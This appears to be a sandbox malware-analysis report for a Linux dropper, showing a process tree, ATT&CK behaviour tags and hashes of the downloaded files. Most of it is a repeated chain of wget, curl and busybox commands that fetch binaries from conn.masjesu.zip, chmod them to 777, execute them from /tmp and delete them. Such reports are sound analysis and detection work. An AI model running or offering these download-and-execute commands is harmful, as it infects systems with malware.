/bin/chmodchmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵PID:954
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵PID:955
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:956
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵PID:958
-
-
/bin/chmodchmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵PID:961
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- System Network Configuration Discovery
PID:962
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- System Network Configuration Discovery
PID:965
-
-
/bin/chmodchmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- File and Directory Permissions Modification
PID:966
-
-
/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- Executes dropped EXE
PID:967
-
-
/bin/rmrm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵PID:968
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- System Network Configuration Discovery
PID:969
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:970
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- System Network Configuration Discovery
PID:972
-
-
/bin/chmodchmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵PID:975
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- System Network Configuration Discovery
PID:976
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- System Network Configuration Discovery
PID:979
-
-
/bin/chmodchmod 777 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- File and Directory Permissions Modification
PID:980
-
-
/tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB./rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- Executes dropped EXE
PID:981
-
-
/bin/rmrm rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵PID:982
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- System Network Configuration Discovery
PID:983
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:984
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵PID:986
-
-
/bin/chmodchmod 777 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- File and Directory Permissions Modification
PID:987
-
-
/tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N./hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- Executes dropped EXE
PID:988
-
-
/bin/rmrm hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵PID:989
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵PID:990
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:991
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- System Network Configuration Discovery
PID:993
-
-
/bin/chmodchmod 777 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- File and Directory Permissions Modification
PID:994
-
-
/tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98./tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- Executes dropped EXE
PID:995
-
-
/bin/rmrm tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵PID:997
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵PID:998
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:999
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- System Network Configuration Discovery
PID:1001
-
-
/bin/chmodchmod 777 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- File and Directory Permissions Modification
PID:1002
-
-
/tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ./xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- Executes dropped EXE
PID:1003
-
-
/bin/rmrm xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵PID:1005
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵PID:1006
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1007
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- System Network Configuration Discovery
PID:1009
-
-
/bin/chmodchmod 777 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- File and Directory Permissions Modification
PID:1010
-
-
/tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75./MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- Executes dropped EXE
PID:1011
-
-
/bin/rmrm MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵PID:1012
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- System Network Configuration Discovery
PID:1013
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1014
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵PID:1016
-
-
/bin/chmodchmod 777 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- File and Directory Permissions Modification
PID:1017
-
-
/tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly./PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- Executes dropped EXE
PID:1018
-
-
/bin/rmrm PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵PID:1019
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
176B
MD5e1732e70f015e99d14dff1eeeaec9966
SHA1c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA2566de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA5126ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7
-
Filesize
114B
MD5546071c6a6aeff34580b4d1a9b35a7c3
SHA1dc2de298837a86d3bc86e8a328411229d9eccdb6
SHA2562d1255033a3f5cde3fb430b15d84ad95c1d7d37b25132cd3dcca7c30963e9f12
SHA512207f333daf98fe653f4f661defd86651cbb50e3482511769d0558d2fd80ce107ec6a519424e05107740a802b444b62445901788d80dde4e8dbc8ee116d5b9be7
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97